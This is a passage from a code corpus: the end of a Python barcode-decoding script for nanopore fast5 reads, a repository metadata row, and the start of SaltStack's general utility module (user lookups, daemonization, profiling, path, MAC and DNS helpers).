parser_barcode2.add_argument('--barcodetable2', type=str, default=False,
help='''When two different barcodes are expected in a row at 5' end.''')
parser_barcode2.add_argument('--barcodefasta2', type=str, default=False,
help='''When two different barcodes are expected in a row at 5' end.''')
parser.add_argument('--barstart2', type=int, default=0, help='''Start location within read sequence to begin searching for the second barcode.
Default: 0.
Will use match, mismatch, gap, barcolumns, barlength, barflank, and barmin parameters from barcode1.''')
## Search both ends
parser.add_argument('--bothstrands', action='store_true', default=False, help='''Search both strands of read for barcodes.
This will actually reverse complement the end of reads (only the amount of search length needed), and look for barcodes in them.''')
##parser.add_argument('--revbaroffset', type=int, default=0, help='''By default, when looking for barcodes on the bottom strand,
##it will just look from -search_length until the end. This tells it to go back farther. However, for now, it will still search all the way until the end,
##unless --revsearchlenonly is specified.''')
##parser.add_argument('--revsearchlenonly', action='store_true', default=False, help='''When looking on bottom strand using offset,
##do not go until end - only look as much as search len....''')
parser.add_argument('-c', '--comments', type=str, default=False, help='''Add fast5 info to output.
Default: no comments/False.
Leave any desired string here (you may need to enclode in quotes is there are spaces).
Alternatively, specify one of the following options:
base_info
pore_info
read_stats
event_stats
read_event_stats
''')
parser.add_argument('-H', '--header', action='store_true', default=False, help='''Add header with hashtag in front (#). Use --nohash to just get header free of hashtag.''')
parser.add_argument('--nohash', action='store_true', default=False, help='''Do not put # in front of header.''')
parser.add_argument('-S', '--samflag', action='store_true', default=False, help='''Add sam flag to comments.''')
parser.add_argument('--minlen', type=int, default=0, help='''Only report reads >= minlen. Default: 0 bp.''')
parser.add_argument('--maxlen', type=int, default=int(3e9), help='''Only report reads <= maxlen. Default: 3 billion bp.''')
parser.add_argument('--minq', type=float, default=0, help='''Only report reads with mean quality scores >= Q. Default: 0.''')
parser.add_argument('--maxq', type=float, default=int(10e3), help='''Only report reads with mean quality scores <= Q.
Default: 10000 (this is orders of magnitude higher than normal max which are always < 20)''')
parser.add_argument('-a', '--abspath', action='store_true', default=False, help='''By default fast5 files are identified by their name minus the .fast5 extension.
Using this option replaces that default with absolute path of their location.
Note: this works best if the fast5s are located in sub-directories as per python os.path.abspath limitations.''')
##parser.add_argument('-o', '--outprefix', default="fast5_sw_bardecoded",
## type= str,
## help='''Choose an outprefix for files generated. Default: fast5_sw_bardecoded''')
parser.add_argument('--outfile', type=str, default=False, help='''Default is to print to stdout. This will redirect into a file.''')
parser.add_argument('--notarlite', action='store_true', default=False, help=''' The default methof (called tarlite) extracts 1 file from a given tarchive at a time, processes, and deletes it.
This options says to turn tarlite off resulting in extracting entire tarchive before proceeding (and finally deleting).
It is possible that --notarlite is faster, but at the expense of exceeding file number limits or disk storage quotas.
Nonetheless, the difference in speed is a lot smaller than the difference in space needed.
For example, not using tarlite will require >2*tarchive amount of disk space (i.e. the tar.gz and its extracted contents).
The tarlite method only requires the disk space already taken by the tarchive and enough for 1 additional file at a time.
A corollary is that tarlite just needs to be allowed to form 1 (or a few) files compared to what could be thousands to millions.
''')
parser.add_argument('--tarlite', action='store_true', default=False, help='''This legacy option is outdated.
However, it is kept here to avoid breaking pipelines that make use of it.
The tarlite approach is now default. Specifying this will not change that default behavior.
It will just prevent pipelines from breaking.
However, not specifying this will still also result in the tarlite approach.
Use --notarlite to turn it off.''')
## TODO:
## 1. Test option -- provide full length known sequences. When barcode is chosen, alignment score of entire read
## against entire known sequence is then computed (as well as maybe coordinates of the alignment)...
## Perhaps global options will be used...
## 2. Accept adapter sequences to trim off before barcode alignment OR to use with the barcode alignment.
args = parser.parse_args()
#################################################
## Require read type to be set correctly
#################################################
args.readtype = assert_readtype(args.readtype, legaloptions="tc2")
#################################################
## Obtain barcodes
#################################################
#################################################
#### EXECUTE @@@@@@@@@@@@
#################################################
if __name__ == "__main__":
## print to stdout?
if not args.outfile:
OUT = sys.stdout
else:
OUT = open(args.outfile, 'w')
## For now, this is controlled to grab the fastq with only the filename
if args.abspath:
output = get_fast5tofastx_output_fxn('fastq_only_abspath')
else:
output = get_fast5tofastx_output_fxn('fastq_only_filename')
getread = get_fast5tofastx_readtype_fxn(args.readtype)
#get barcodes and search parameters
barcodes = read_in_barcodes(barcodetable=args.barcodetable, barcodefasta=args.barcodefasta, barcolumns=args.barcolumns)
search_len = get_barcode_search_length(barcodes, barlength=args.barlength, barflank=args.barflank, minbarlen=args.barmin)
search_start = args.barstart
search_end = search_start + search_len
## Two positive strand barcodes True?
two_pos_barcodes = args.barcodetable2 or args.barcodefasta2
if two_pos_barcodes:
barcodes2 = read_in_barcodes(barcodetable=args.barcodetable2, barcodefasta=args.barcodefasta2, barcolumns=args.barcolumns)
search_start2 = args.barstart2
search_end2 = search_start2 + search_len
#Looking on both strands? Then rev comp barcodes
if args.bothstrands:
revbarcodes = rev_comp_seq_dict(barcodes)
rev_search_end = -search_start
if two_pos_barcodes:
revbarcodes2 = read_in_barcodes(barcodetable=args.barcodetable2, barcodefasta=args.barcodefasta2, barcolumns=args.barcolumns)
#create alignment objects
sw = get_alignment_object(args.match, args.mismatch, args.gap_open, args.gap_ext, args.gap_decay, verbose=False, globalalign=args.global_aln, full_query=args.full_query)
# interpret sam flag arg
samflag=''
if args.samflag:
samflag = 'F5:Z:'
# What to print from best alignment
# always give name and probability
get = [0,1]
header = ['readname']
headeradds = ['barcode', 'probability']
if args.maxscore:
get.append( 2 )
headeradds.append('maxscore')
if args.meanscore:
get.append( 3 )
headeradds.append('meanscore')
if args.allscores:
get.append( 4 )
headeradds.append('allscores')
if args.allprobs:
get.append( 5 )
headeradds.append('allprobs')
if args.barcode_coords:
get.append( 6 )
get.append( 7 )
headeradds.append('bc_start')
headeradds.append('bc_end')
if args.read_coords:
get.append( 8 )
get.append( 9 )
headeradds.append('read_start')
headeradds.append('read_end')
if args.cigar:
get.append( 10 )
headeradds.append('cigar')
if args.compute_other_probs:
headeradds.append('barcode2')
headeradds.append('p_minion')
headeradds.append('barcode3')
headeradds.append('p_minion_scaled')
headeradds.append('barcode4')
headeradds.append('p_binomial')
for add in headeradds:
header.append( 'set1_topstrand_' + add )
if two_pos_barcodes:
for add in headeradds:
header.append( 'set2_topstrand_' + add )
if args.bothstrands:
for add in headeradds:
header.append( 'set1_bottomstrand_' + add )
if two_pos_barcodes:
for add in headeradds:
header.append( 'set2_bottomstrand_' + add )
if args.comments:
header.append( 'f5info' )
if args.sequence:
header.append('f5_sequence')
if args.quals:
header.append('f5_quals')
## Set these to empty
seq=[]
quals=[]
aln2 = []
revaln1 = []
revaln2 = []
otherprobs1 = []
otherprobs2 = []
revotherprobs1 = []
revotherprobs2 = []
#HEADER?
if args.header:
if not args.nohash:
header[0] = '#'+header[0]
OUT.write( ('\t').join(header) + '\n' )
# execute for loop
for f5 in Fast5List(args.fast5, keep_tar_footprint_small=(not args.notarlite)):
if f5.is_not_corrupt() and f5.is_nonempty:
read = getread(f5, args.minlen, args.maxlen, args.minq, args.maxq, output, comments=args.comments, samflag=samflag)
if read:
#Remove '@' from name and newline from end while breaking fastq up into list of 4 fields.
read = read[1:].strip().split('\n')
name = read[0].split()
if len(name) == 1:
readname = [name[0]]
comments = []
elif len(name) == 2:
readname = [name[0]]
comments = [name[1]]
if args.sequence:
seq = [read[1]]
if args.quals:
quals = [read[3]]
# Look for first (maybe only) barcode on top strand
bcaln = BarcodeChoice(barcodes, sw, read[1], search_start, search_end, ref_name=read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
aln1 = [str(e) for e in bcaln.get_subset_maxbar_list(get)]
if args.compute_other_probs:
otherprobs1 = [str(e) for e in [bcaln.maxminionbar['p_minion'], bcaln.maxminion['p_minion'], bcaln.maxminionbar['norm_p_minion'], bcaln.maxminion['norm_p_minion'], bcaln.maxbinombar[1], bcaln.maxbinom[1]]]
## all I added were the probs that include unaligned portions -- can also add probs with only aligned portions... but it seems too much
# If opted, look for second barcode on top strand
if two_pos_barcodes:
bcaln2 = BarcodeChoice(barcodes2, sw, read[1], search_start2, search_end2, ref_name=read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
aln2 = [str(e) for e in bcaln2.get_subset_maxbar_list(get)]
otherprobs2 = [str(e) for e in [bcaln2.maxminionbar['p_minion'], bcaln2.maxminion['p_minion'], bcaln2.maxminionbar['norm_p_minion'], bcaln2.maxminion['norm_p_minion'], bcaln2.maxbinombar[1], bcaln2.maxbinom[1]]]
# Potentially look at the bottom strand by using reverse complement barcodes
if args.bothstrands:
revcompseq = revcomp(read[1][-search_end:])
revbcaln = BarcodeChoice(barcodes, sw, revcompseq, search_start, search_end, ref_name='revcomp_'+read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
revaln1 = [str(e) for e in revbcaln.get_subset_maxbar_list(get)]
revotherprobs1 = [str(e) for e in [revbcaln.maxminionbar['p_minion'], revbcaln.maxminion['p_minion'], revbcaln.maxminionbar['norm_p_minion'], revbcaln.maxminion['norm_p_minion'], revbcaln.maxbinombar[1], revbcaln.maxbinom[1]]]
# If opted, look for second barcode on top strand
if two_pos_barcodes:
revbcaln2 = BarcodeChoice(barcodes2, sw, revcompseq, search_start2, search_end2, ref_name='revcomp_'+read[0], use_entire_barcode=True, compute_all=args.compute_other_probs)
revaln2 = [str(e) for e in revbcaln2.get_subset_maxbar_list(get)]
revotherprobs2 = [str(e) for e in [revbcaln2.maxminionbar['p_minion'], revbcaln2.maxminion['p_minion'], revbcaln2.maxminionbar['norm_p_minion'], revbcaln2.maxminion['norm_p_minion'], revbcaln2.maxbinombar[1], revbcaln2.maxbinom[1]]]
out = ('\t').join( readname + aln1 + otherprobs1 + aln2 + otherprobs2 + revaln1 + revotherprobs1 + revaln2 + revotherprobs2 + comments + seq + quals)
OUT.write( out + '\n' )
## print to stdout?
if args.outfile:
OUT.close()
|
JohnUrban/fast5tools
|
bin/fast5_sw_bardecoder.py
|
Python
|
mit
| 20,901
|
[
"BWA"
] |
2d615b04c547e7d83f72cdecc16c6cc779211f58c0f805526c3d5e1c094f2504
|
# -*- coding: utf-8 -*-
'''
Some of the utils used by salt
'''
# Import python libs
from __future__ import absolute_import, division, print_function
import contextlib
import copy
import collections
import datetime
import distutils.version # pylint: disable=import-error,no-name-in-module
import errno
import fnmatch
import hashlib
import imp
import json
import logging
import numbers
import os
import pprint
import random
import re
import shlex
import shutil
import socket
import stat
import sys
import pstats
import tempfile
import time
import types
import warnings
import string
import subprocess
# Import 3rd-party libs
from salt.ext import six
# pylint: disable=import-error
from salt.ext.six.moves.urllib.parse import urlparse # pylint: disable=no-name-in-module
# pylint: disable=redefined-builtin
from salt.ext.six.moves import range
from salt.ext.six.moves import zip
from salt.ext.six.moves import map
from stat import S_IMODE
# pylint: enable=import-error,redefined-builtin
try:
import cProfile
HAS_CPROFILE = True
except ImportError:
HAS_CPROFILE = False
# Import 3rd-party libs
try:
import Crypto.Random
HAS_CRYPTO = True
except ImportError:
HAS_CRYPTO = False
try:
import timelib
HAS_TIMELIB = True
except ImportError:
HAS_TIMELIB = False
try:
import parsedatetime
HAS_PARSEDATETIME = True
except ImportError:
HAS_PARSEDATETIME = False
try:
import fcntl
HAS_FCNTL = True
except ImportError:
# fcntl is not available on windows
HAS_FCNTL = False
try:
import win32api
HAS_WIN32API = True
except ImportError:
HAS_WIN32API = False
try:
import grp
HAS_GRP = True
except ImportError:
# grp is not available on windows
HAS_GRP = False
try:
import pwd
HAS_PWD = True
except ImportError:
# pwd is not available on windows
HAS_PWD = False
try:
import setproctitle
HAS_SETPROCTITLE = True
except ImportError:
HAS_SETPROCTITLE = False
try:
import ctypes
import ctypes.util
libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"))
res_init = libc.__res_init
HAS_RESINIT = True
except (ImportError, OSError, AttributeError):
HAS_RESINIT = False
# Import salt libs
from salt.defaults import DEFAULT_TARGET_DELIM
import salt.defaults.exitcodes
import salt.log
import salt.version
from salt.utils.decorators import memoize as real_memoize
from salt.textformat import TextFormat
from salt.exceptions import (
CommandExecutionError, SaltClientError,
CommandNotFoundError, SaltSystemExit,
SaltInvocationError
)
log = logging.getLogger(__name__)
_empty = object()
def safe_rm(tgt):
'''
Safely remove a file
'''
try:
os.remove(tgt)
except (IOError, OSError):
pass
def is_empty(filename):
'''
Is a file empty?
'''
try:
return os.stat(filename).st_size == 0
except OSError:
# Non-existent file or permission denied to the parent dir
return False
def is_hex(value):
'''
Returns True if value is a hexidecimal string, otherwise returns False
'''
try:
int(value, 16)
return True
except (TypeError, ValueError):
return False
def get_color_theme(theme):
'''
Return the color theme to use
'''
# Keep the heavy lifting out of the module space
import yaml
if not os.path.isfile(theme):
log.warning('The named theme {0} if not available'.format(theme))
try:
with fopen(theme, 'rb') as fp_:
colors = yaml.safe_load(fp_.read())
ret = {}
for color in colors:
ret[color] = '\033[{0}m'.format(colors[color])
if not isinstance(colors, dict):
log.warning('The theme file {0} is not a dict'.format(theme))
return {}
return ret
except Exception:
log.warning('Failed to read the color theme {0}'.format(theme))
return {}
def get_colors(use=True, theme=None):
'''
Return the colors as an easy to use dict. Pass `False` to deactivate all
colors by setting them to empty strings. Pass a string containing only the
name of a single color to be used in place of all colors. Examples:
.. code-block:: python
colors = get_colors() # enable all colors
no_colors = get_colors(False) # disable all colors
red_colors = get_colors('RED') # set all colors to red
'''
colors = {
'BLACK': TextFormat('black'),
'DARK_GRAY': TextFormat('bold', 'black'),
'RED': TextFormat('red'),
'LIGHT_RED': TextFormat('bold', 'red'),
'GREEN': TextFormat('green'),
'LIGHT_GREEN': TextFormat('bold', 'green'),
'YELLOW': TextFormat('yellow'),
'LIGHT_YELLOW': TextFormat('bold', 'yellow'),
'BLUE': TextFormat('blue'),
'LIGHT_BLUE': TextFormat('bold', 'blue'),
'MAGENTA': TextFormat('magenta'),
'LIGHT_MAGENTA': TextFormat('bold', 'magenta'),
'CYAN': TextFormat('cyan'),
'LIGHT_CYAN': TextFormat('bold', 'cyan'),
'LIGHT_GRAY': TextFormat('white'),
'WHITE': TextFormat('bold', 'white'),
'DEFAULT_COLOR': TextFormat('default'),
'ENDC': TextFormat('reset'),
}
if theme:
colors.update(get_color_theme(theme))
if not use:
for color in colors:
colors[color] = ''
if isinstance(use, str):
# Try to set all of the colors to the passed color
if use in colors:
for color in colors:
# except for color reset
if color == 'ENDC':
continue
colors[color] = colors[use]
return colors
def get_context(template, line, num_lines=5, marker=None):
'''
Returns debugging context around a line in a given string
Returns:: string
'''
template_lines = template.splitlines()
num_template_lines = len(template_lines)
# in test, a single line template would return a crazy line number like,
# 357. do this sanity check and if the given line is obviously wrong, just
# return the entire template
if line > num_template_lines:
return template
context_start = max(0, line - num_lines - 1) # subt 1 for 0-based indexing
context_end = min(num_template_lines, line + num_lines)
error_line_in_context = line - context_start - 1 # subtr 1 for 0-based idx
buf = []
if context_start > 0:
buf.append('[...]')
error_line_in_context += 1
buf.extend(template_lines[context_start:context_end])
if context_end < num_template_lines:
buf.append('[...]')
if marker:
buf[error_line_in_context] += marker
# warning: jinja content may contain unicode strings
# instead of utf-8.
buf = [to_str(i) if isinstance(i, six.text_type) else i for i in buf]
return '---\n{0}\n---'.format('\n'.join(buf))
def get_user():
'''
Get the current user
'''
if HAS_PWD:
return pwd.getpwuid(os.geteuid()).pw_name
else:
return win32api.GetUserName()
def get_uid(user=None):
"""
Get the uid for a given user name. If no user given,
the current euid will be returned. If the user
does not exist, None will be returned. On
systems which do not support pwd or os.geteuid
it will return None.
"""
if not HAS_PWD:
result = None
elif user is None:
try:
result = os.geteuid()
except AttributeError:
result = None
else:
try:
u_struct = pwd.getpwnam(user)
except KeyError:
result = None
else:
result = u_struct.pw_uid
return result
def get_gid(group=None):
"""
Get the gid for a given group name. If no group given,
the current egid will be returned. If the group
does not exist, None will be returned. On
systems which do not support grp or os.getegid
it will return None.
"""
if grp is None:
result = None
elif group is None:
try:
result = os.getegid()
except AttributeError:
result = None
else:
try:
g_struct = grp.getgrnam(group)
except KeyError:
result = None
else:
result = g_struct.gr_gid
return result
def _win_user_token_is_admin(user_token):
'''
Using the win32 api, determine if the user with token 'user_token' has
administrator rights.
See MSDN entry here:
http://msdn.microsoft.com/en-us/library/aa376389(VS.85).aspx
'''
class SID_IDENTIFIER_AUTHORITY(ctypes.Structure):
_fields_ = [
("byte0", ctypes.c_byte),
("byte1", ctypes.c_byte),
("byte2", ctypes.c_byte),
("byte3", ctypes.c_byte),
("byte4", ctypes.c_byte),
("byte5", ctypes.c_byte),
]
nt_authority = SID_IDENTIFIER_AUTHORITY()
nt_authority.byte5 = 5
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220
administrators_group = ctypes.c_void_p()
if ctypes.windll.advapi32.AllocateAndInitializeSid(
ctypes.byref(nt_authority),
2,
SECURITY_BUILTIN_DOMAIN_RID,
DOMAIN_ALIAS_RID_ADMINS,
0, 0, 0, 0, 0, 0,
ctypes.byref(administrators_group)) == 0:
raise Exception("AllocateAndInitializeSid failed")
try:
is_admin = ctypes.wintypes.BOOL()
if ctypes.windll.advapi32.CheckTokenMembership(
user_token,
administrators_group,
ctypes.byref(is_admin)) == 0:
raise Exception("CheckTokenMembership failed")
return is_admin.value != 0
finally:
ctypes.windll.advapi32.FreeSid(administrators_group)
def _win_current_user_is_admin():
'''
ctypes.windll.shell32.IsUserAnAdmin() is intentionally avoided due to this
function being deprecated.
'''
return _win_user_token_is_admin(0)
def get_specific_user():
'''
Get a user name for publishing. If you find the user is "root" attempt to be
more specific
'''
user = get_user()
if is_windows():
if _win_current_user_is_admin():
return 'sudo_{0}'.format(user)
else:
env_vars = ('SUDO_USER',)
if user == 'root':
for evar in env_vars:
if evar in os.environ:
return 'sudo_{0}'.format(os.environ[evar])
return user
def reinit_crypto():
'''
When a fork arrises, pycrypto needs to reinit
From its doc::
Caveat: For the random number generator to work correctly,
you must call Random.atfork() in both the parent and
child processes after using os.fork()
'''
if HAS_CRYPTO:
Crypto.Random.atfork()
def daemonize(redirect_out=True):
'''
Daemonize a process
'''
try:
pid = os.fork()
if pid > 0:
# exit first parent
reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error(
'fork #1 failed: {0} ({1})'.format(exc.errno, exc.strerror)
)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# decouple from parent environment
os.chdir('/')
# noinspection PyArgumentList
os.setsid()
os.umask(18)
# do second fork
try:
pid = os.fork()
if pid > 0:
reinit_crypto()
sys.exit(salt.defaults.exitcodes.EX_OK)
except OSError as exc:
log.error(
'fork #2 failed: {0} ({1})'.format(
exc.errno, exc.strerror
)
)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
reinit_crypto()
# A normal daemonization redirects the process output to /dev/null.
# Unfortunately when a python multiprocess is called the output is
# not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with fopen('/dev/null', 'r+') as dev_null:
os.dup2(dev_null.fileno(), sys.stdin.fileno())
os.dup2(dev_null.fileno(), sys.stdout.fileno())
os.dup2(dev_null.fileno(), sys.stderr.fileno())
def daemonize_if(opts):
'''
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
'''
if 'salt-call' in sys.argv[0]:
return
if not opts.get('multiprocessing', True):
return
if sys.platform.startswith('win'):
return
daemonize(False)
def profile_func(filename=None):
'''
Decorator for adding profiling to a nested function in Salt
'''
def proffunc(fun):
def profiled_func(*args, **kwargs):
logging.info('Profiling function {0}'.format(fun.__name__))
try:
profiler = cProfile.Profile()
retval = profiler.runcall(fun, *args, **kwargs)
profiler.dump_stats((filename or '{0}_func.profile'
.format(fun.__name__)))
except IOError:
logging.exception(
'Could not open profile file {0}'.format(filename)
)
return retval
return profiled_func
return proffunc
def rand_str(size=9999999999, hash_type=None):
'''
Return a random string
'''
if not hash_type:
hash_type = 'md5'
hasher = getattr(hashlib, hash_type)
return hasher(str(random.SystemRandom().randint(0, size))).hexdigest()
def which(exe=None):
'''
Python clone of /usr/bin/which
'''
def _is_executable_file_or_link(exe):
# check for os.X_OK doesn't suffice because directory may executable
return (os.access(exe, os.X_OK) and
(os.path.isfile(exe) or os.path.islink(exe)))
if exe:
if _is_executable_file_or_link(exe):
# executable in cwd or fullpath
return exe
ext_list = os.environ.get('PATHEXT', '.EXE').split(';')
@real_memoize
def _exe_has_ext():
'''
Do a case insensitive test if exe has a file extension match in
PATHEXT
'''
for ext in ext_list:
try:
pattern = r'.*\.' + ext.lstrip('.') + r'$'
re.match(pattern, exe, re.I).groups()
return True
except AttributeError:
continue
return False
# Enhance POSIX path for the reliability at some environments, when $PATH is changing
# This also keeps order, where 'first came, first win' for cases to find optional alternatives
search_path = os.environ.get('PATH') and os.environ['PATH'].split(os.pathsep) or list()
for default_path in ['/bin', '/sbin', '/usr/bin', '/usr/sbin', '/usr/local/bin']:
if default_path not in search_path:
search_path.append(default_path)
os.environ['PATH'] = os.pathsep.join(search_path)
for path in search_path:
full_path = os.path.join(path, exe)
if _is_executable_file_or_link(full_path):
return full_path
elif is_windows() and not _exe_has_ext():
# On Windows, check for any extensions in PATHEXT.
# Allows both 'cmd' and 'cmd.exe' to be matched.
for ext in ext_list:
# Windows filesystem is case insensitive so we
# safely rely on that behavior
if _is_executable_file_or_link(full_path + ext):
return full_path + ext
log.trace('\'{0}\' could not be found in the following search path: \'{1}\''.format(exe, search_path))
else:
log.error('No executable was passed to be searched by salt.utils.which()')
return None
def which_bin(exes):
'''
Scan over some possible executables and return the first one that is found
'''
if not isinstance(exes, collections.Iterable):
return None
for exe in exes:
path = which(exe)
if not path:
continue
return path
return None
def activate_profile(test=True):
pr = None
if test:
if HAS_CPROFILE:
pr = cProfile.Profile()
pr.enable()
else:
log.error('cProfile is not available on your platform')
return pr
def output_profile(pr, stats_path='/tmp/stats', stop=False, id_=None):
if pr is not None and HAS_CPROFILE:
try:
pr.disable()
if not os.path.isdir(stats_path):
os.makedirs(stats_path)
date = datetime.datetime.now().isoformat()
if id_ is None:
id_ = rand_str(size=32)
ficp = os.path.join(stats_path, '{0}.{1}.pstats'.format(id_, date))
fico = os.path.join(stats_path, '{0}.{1}.dot'.format(id_, date))
ficn = os.path.join(stats_path, '{0}.{1}.stats'.format(id_, date))
if not os.path.exists(ficp):
pr.dump_stats(ficp)
with open(ficn, 'w') as fic:
pstats.Stats(pr, stream=fic).sort_stats('cumulative')
log.info('PROFILING: {0} generated'.format(ficp))
log.info('PROFILING (cumulative): {0} generated'.format(ficn))
pyprof = which('pyprof2calltree')
cmd = [pyprof, '-i', ficp, '-o', fico]
if pyprof:
failed = False
try:
pro = subprocess.Popen(
cmd, shell=False,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except OSError:
failed = True
if pro.returncode:
failed = True
if failed:
log.error('PROFILING (dot problem')
else:
log.info('PROFILING (dot): {0} generated'.format(fico))
log.trace('pyprof2calltree output:')
log.trace(to_str(pro.stdout.read()).strip() +
to_str(pro.stderr.read()).strip())
else:
log.info('You can run {0} for additional stats.'.format(cmd))
finally:
if not stop:
pr.enable()
return pr
def list_files(directory):
'''
Return a list of all files found under directory
'''
ret = set()
ret.add(directory)
for root, dirs, files in safe_walk(directory):
for name in files:
ret.add(os.path.join(root, name))
for name in dirs:
ret.add(os.path.join(root, name))
return list(ret)
def gen_mac(prefix='AC:DE:48'):
'''
Generates a MAC address with the defined OUI prefix.
Common prefixes:
- ``00:16:3E`` -- Xen
- ``00:18:51`` -- OpenVZ
- ``00:50:56`` -- VMware (manually generated)
- ``52:54:00`` -- QEMU/KVM
- ``AC:DE:48`` -- PRIVATE
References:
- http://standards.ieee.org/develop/regauth/oui/oui.txt
- https://www.wireshark.org/tools/oui-lookup.html
- https://en.wikipedia.org/wiki/MAC_address
'''
return '{0}:{1:02X}:{2:02X}:{3:02X}'.format(prefix,
random.randint(0, 0xff),
random.randint(0, 0xff),
random.randint(0, 0xff))
def mac_str_to_bytes(mac_str):
'''
Convert a MAC address string into bytes. Works with or without separators:
b1 = mac_str_to_bytes('08:00:27:13:69:77')
b2 = mac_str_to_bytes('080027136977')
assert b1 == b2
assert isinstance(b1, bytes)
'''
if len(mac_str) == 12:
pass
elif len(mac_str) == 17:
sep = mac_str[2]
mac_str = mac_str.replace(sep, '')
else:
raise ValueError('Invalid MAC address')
if six.PY3:
mac_bytes = bytes(int(mac_str[s:s+2], 16) for s in range(0, 12, 2))
else:
mac_bytes = ''.join(chr(int(mac_str[s:s+2], 16)) for s in range(0, 12, 2))
return mac_bytes
def ip_bracket(addr):
'''
Convert IP address representation to ZMQ (URL) format. ZMQ expects
brackets around IPv6 literals, since they are used in URLs.
'''
if addr and ':' in addr and not addr.startswith('['):
return '[{0}]'.format(addr)
return addr
def dns_check(addr, safe=False, ipv6=False):
'''
Return the ip resolved by dns, but do not exit on failure, only raise an
exception. Obeys system preference for IPv4/6 address resolution.
'''
error = False
try:
# issue #21397: force glibc to re-read resolv.conf
if HAS_RESINIT:
res_init()
hostnames = socket.getaddrinfo(
addr, None, socket.AF_UNSPEC, socket.SOCK_STREAM
)
if not hostnames:
error = True
else:
addr = False
for h in hostnames:
if h[0] == socket.AF_INET or (h[0] == socket.AF_INET6 and ipv6):
addr = ip_bracket(h[4][0])
break
if not addr:
error = True
except TypeError:
err = ('Attempt to resolve address \'{0}\' failed. Invalid or unresolveable address').format(addr)
raise SaltSystemExit(code=42, msg=err)
except socket.error:
error = True
if error:
err = ('DNS lookup of \'{0}\' failed.').format(addr)
if safe:
if salt.log.is_console_configured():
# If logging is not configured it also means that either
# the master or minion instance calling this hasn't even
# started running
log.error(err)
raise SaltClientError()
raise SaltSystemExit(code=42, msg=err)
return addr
def required_module_list(docstring=None):
'''
Return a list of python modules required by a salt module that aren't
in stdlib and don't exist on the current pythonpath.
'''
if not docstring:
return []
ret = []
modules = parse_docstring(docstring).get('deps', [])
for mod in modules:
try:
imp.find_module(mod)
except ImportError:
ret.append(mod)
return ret
def required_modules_error(name, docstring):
'''
Pretty print error messages in critical salt modules which are
missing deps not always in stdlib such as win32api on windows.
'''
modules = required_module_list(docstring)
if not modules:
return ''
filename = os.path.basename(name).split('.')[0]
msg = '\'{0}\' requires these python modules: {1}'
return msg.format(filename, ', '.join(modules))
def get_accumulator_dir(cachedir):
'''
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
'''
fn_ = os.path.join(cachedir, 'accumulator')
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def check_or_die(command):
'''
Simple convenience function for modules to use for gracefully blowing up
if a required tool is not available in the system path.
Lazily import `salt.modules.cmdmod` to avoid any sort of circular
dependencies.
'''
if command is None:
raise CommandNotFoundError('\'None\' is not a valid command.')
if not which(command):
raise CommandNotFoundError('\'{0}\' is not in the path'.format(command))
def backup_minion(path, bkroot):
'''
Backup a file on the minion
'''
dname, bname = os.path.split(path)
if salt.utils.is_windows():
src_dir = dname.replace(':', '_')
else:
src_dir = dname[1:]
if not salt.utils.is_windows():
fstat = os.stat(path)
msecs = str(int(time.time() * 1000000))[-6:]
if salt.utils.is_windows():
# ':' is an illegal filesystem path character on Windows
stamp = time.strftime('%a_%b_%d_%H-%M-%S_%Y')
else:
stamp = time.strftime('%a_%b_%d_%H:%M:%S_%Y')
stamp = '{0}{1}_{2}'.format(stamp[:-4], msecs, stamp[-4:])
bkpath = os.path.join(bkroot,
src_dir,
'{0}_{1}'.format(bname, stamp))
if not os.path.isdir(os.path.dirname(bkpath)):
os.makedirs(os.path.dirname(bkpath))
shutil.copyfile(path, bkpath)
if not salt.utils.is_windows():
os.chown(bkpath, fstat.st_uid, fstat.st_gid)
os.chmod(bkpath, fstat.st_mode)
def path_join(*parts):
'''
This functions tries to solve some issues when joining multiple absolute
paths on both *nix and windows platforms.
See tests/unit/utils/path_join_test.py for some examples on what's being
talked about here.
'''
# Normalize path converting any os.sep as needed
parts = [os.path.normpath(p) for p in parts]
root = parts.pop(0)
if not parts:
return root
if is_windows():
if len(root) == 1:
root += ':'
root = root.rstrip(os.sep) + os.sep
return os.path.normpath(os.path.join(
root, *[p.lstrip(os.sep) for p in parts]
))
def pem_finger(path=None, key=None, sum_type='sha256'):
'''
Pass in either a raw pem string, or the path on disk to the location of a
pem file, and the type of cryptographic hash to use. The default is SHA256.
The fingerprint of the pem will be returned.
If neither a key nor a path are passed in, a blank string will be returned.
'''
if not key:
if not os.path.isfile(path):
return ''
with fopen(path, 'rb') as fp_:
key = ''.join([x for x in fp_.readlines() if x.strip()][1:-1])
pre = getattr(hashlib, sum_type)(key).hexdigest()
finger = ''
for ind in range(len(pre)):
if ind % 2:
# Is odd
finger += '{0}:'.format(pre[ind])
else:
finger += pre[ind]
return finger.rstrip(':')
def build_whitespace_split_regex(text):
'''
Create a regular expression at runtime which should match ignoring the
addition or deletion of white space or line breaks, unless between commas
Example:
.. code-block:: yaml
>>> import re
>>> from salt.utils import *
>>> regex = build_whitespace_split_regex(
... """if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then"""
... )
>>> regex
'(?:[\\s]+)?if(?:[\\s]+)?\\[(?:[\\s]+)?\\-z(?:[\\s]+)?\\"\\$debian'
'\\_chroot\\"(?:[\\s]+)?\\](?:[\\s]+)?\\&\\&(?:[\\s]+)?\\[(?:[\\s]+)?'
'\\-r(?:[\\s]+)?\\/etc\\/debian\\_chroot(?:[\\s]+)?\\]\\;(?:[\\s]+)?'
'then(?:[\\s]+)?'
>>> re.search(
... regex,
... """if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then"""
... )
<_sre.SRE_Match object at 0xb70639c0>
>>>
'''
def __build_parts(text):
lexer = shlex.shlex(text)
lexer.whitespace_split = True
lexer.commenters = ''
if '\'' in text:
lexer.quotes = '"'
elif '"' in text:
lexer.quotes = '\''
